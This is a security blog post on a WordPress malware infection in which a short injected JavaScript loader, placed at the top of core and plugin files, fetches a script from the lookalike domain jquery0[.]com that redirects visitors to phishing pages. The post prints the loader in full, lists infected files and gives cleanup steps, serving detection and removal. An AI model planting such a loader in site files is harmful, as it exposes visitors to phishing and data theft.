Home » Cyber Awareness » Cyber Tip » Fix Fake jQuery Redirection to Scam Domain Visitors to jquery0.com

Fix Fake jQuery Redirection to Scam Domain Visitors to jquery0.com

Written by Anuraag Singh ~ Modified: 28-12-2022 ~ Cyber Tip ~ 6 Minutes Reading

A new infection has been detected on several WordPress sites. It can be executed through a malicious script that comes from a domain known as https://jquery0[.]com/JkrJYcvQ

If you have norton antivirus installed and updated with latest definitions it will flag opening of such website.

norton alert jquery0.com

At first glance, this domain looks like it could be authentic. On the other hand, the attackers selected the domain name on purpose to trick webmasters. It looks and functions almost exactly like the official website for the widely used JavaScript library jQuery – https://jquery.com

When site visitors see the well-known jQuery name in the requests, they can get the impression that it’s okay to load the content. Regrettably, the domain in question is not a perfect match, and it exhibits malignant tendencies. Phishing and spamming campaigns frequently make use of this strategy to deceive victims into believing that the resources in question are genuine.

First things first, let’s have a look at the injection.

JavaScript injection exploits jquery0[.]com

During analysis of infection it has been discovered that the genuine WordPress core, theme, and plugin JavaScript files have had the following script injected at the top:

var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);

Let’s have a look at what this three-line piece of code is doing and break it down.

  1. To begin, the code generates a brand-new script tag and sets the src argument to the address https://jquery0.com/JkrJYcvQ.
  2. Following that, it adds it to the currently displayed page and begins the process of running the script.
  3. The final step of the injection involves the execution of the script located at https://jquery0.com/JkrJYcv, which leads users to fraudulent websites.

This injection has been discovered in a variety of different WordPress files, including the following, for instance:

  • wp-includes/js/jquery/ui/effect-transfer.min.js
  • wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js 
  • wp-includes/js/jquery/jquery.min.js
  • wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
  • wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js
  • wp-content/themes/exhibz/core/parallax/assets/js/jarallax.js
  • wp-includes/js/dist/vendor/wp-polyfill.min.js
  • wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js
  • wp-content/plugins/popup-builder/public/js/PopupConfig.js
  • wp-content/plugins/gravityforms/js/gravityforms.min.js
  • wp-content/plugins/buddypress/bp-core/js/jquery-query.min.js
  • wp-content/plugins/showit/public/js/showit.js

Investigating the potentially harmful website jquery0[.]com
Let’s take a more in-depth look at the malicious domain that was utilised in the script that was just described to you.

Finding out a lot about a domain by looking at the WHOIS information for the https://jquery0.com website is possible.

jquery0.com whois

 

In light of these findings, we can deduce the following:

The domain name was just recently acquired. (July 04, 2022)
CloudFlare, which is frequently utilised by cybercriminals, is being used by the site in question.
It’s important to note that the domain just utilises CloudFlare for the Name Servers; it doesn’t make use of the CloudFlare firewall in any capacity. The following URL can be used to directly access the IP address 62.233.50.75 that is located on a Russian CHANGWAY-AS network: https://urlscan.io/ip/62.233.50.75.

Redirects Links to Fraudulent Online Pages

End users are tricked into providing their personal information by being led to fraudulent websites as soon as the malicious script has been activated on their computers. For instance, one of the variants offers the following hoax giveaway for an Apple iPhone 13 Pro:

 

When the victim clicks the “Ok” button, they are taken to a page where sensitive personal information is collected from them.

 

The use of a sense of urgency and a deadline is a typical tactic employed by cybercriminals on phishing websites in an effort to coerce potential victims into making a snap decision to provide their sensitive information.

However, this particular con is just one of many conceivable permutations that may be attempted. MalwareBytes has just recently discovered that this domain is also connected to the malware campaigns known as FakeUpdates and SocGholish.

Steps to Clean Website from JQuery0.com Infection

Once an attacker has acquired unauthorized access to a website, one of the most common tactics that they will take is to inject malicious scripts into the JS files and the files that make up WordPress.

In most of the cases JS folders having javascript .js files are infected and you will see the script at top of the .js file.

Remove below script from JS files.

var khutmhpx = document.createElement(‘script’);
khutmhpx.src = ‘https://jquery0[.]com/JkrJYcvQ’;
document.getElementsByTagName(‘head’)[0].appendChild(khutmhpx);

These scripts, which will fool end users into handing out their personal information, can be well disguised within the files that make up the core of WordPress as well as the files that make up plugins.

There are a lot of precautions you can take to safeguard your website from JavaScript injections, which may be broken down into three categories:

  • Make sure that your website’s plugins, themes, and software are all up to date. Always apply the most recent patch to get the most up-to-date protection against known software vulnerabilities.
  • Conduct routine scans for malicious software and backdoors. This entails doing scans at both the server and client levels in order to detect any potentially harmful injections, SEO spam, or backdoors that might be hiding on your website.
  • Always use a different password for each of your online accounts. This provides login information for sFTP, database, and cPanel users as well as admin users.
  • Keep an eye on your logs for any indications of a security breach. Always keep an eye out for anything that seems odd or fishy, and give serious consideration to installing a file integrity monitoring system on your website.
  • Invest in a firewall for web applications (WAF). Firewalls can assist reduce the impact of malicious bots, protect against brute force assaults, and identify intrusion attempts in your environment.

And if you feel that harmful scripts have been inserted into your site or that it has been compromised in any way, we are here to assist you. If you contact our customer care team for assistance, we will be able to remove the malware on your behalf.